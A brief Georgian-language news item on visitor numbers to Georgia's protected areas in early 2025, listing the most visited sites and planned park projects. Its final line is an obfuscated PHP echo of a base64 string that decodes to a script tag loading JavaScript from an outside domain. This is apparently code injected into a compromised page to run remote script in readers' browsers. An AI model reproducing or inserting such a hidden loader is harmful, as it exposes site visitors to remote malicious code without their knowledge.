gorgia
jaluzi

საქართველოს დაცული ტერიტორიების სააგენტო მიმდინარე წლის იანვარ-მაისის მონაცემებს აქვეყნებს, რომლის თანახმადაც 2025 წლის 5 თვის განმავლობაში საქართველოს დაცულ ტერიტორიებს 243 777 ვიზიტორი ეწვია. სააგენტოს ცნობით, ეს კი 20%-იანი ზრდა წინა წლის ანალოგიურ პერიოდთან შედარებით. სააგენტოს ცნობით, ვიზიტორთა შორის 40% ქართველი, ხოლო 60% სხვა ქვეყნის მოქალაქეა.

ყველაზე მეტი ვიზიტორი ესტუმრა:

პრომეთეს მღვიმეს
მარტვილის კანიონს
სათაფლიას
წალკის კანიონს
მტირალას ეროვნულ პარკს
დაცული ტერიტორიების სააგენტოს ინფორმაიით, მიმდინარე წელს, თბილისის ეროვნული პარკის, ასევე ბირთვისის კანიონის ბუნების ძეგლის განვითარების მასშტაბური პროექტები ხორციელდება.

აღნიშნული პროექტები წლის ბოლომდე დასრულდება და ვიზიტორებს კეთილმოწყობილი და უსაფრთხო მცირე ინფრასტრუქტურით უმასპინძლებს.

158
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");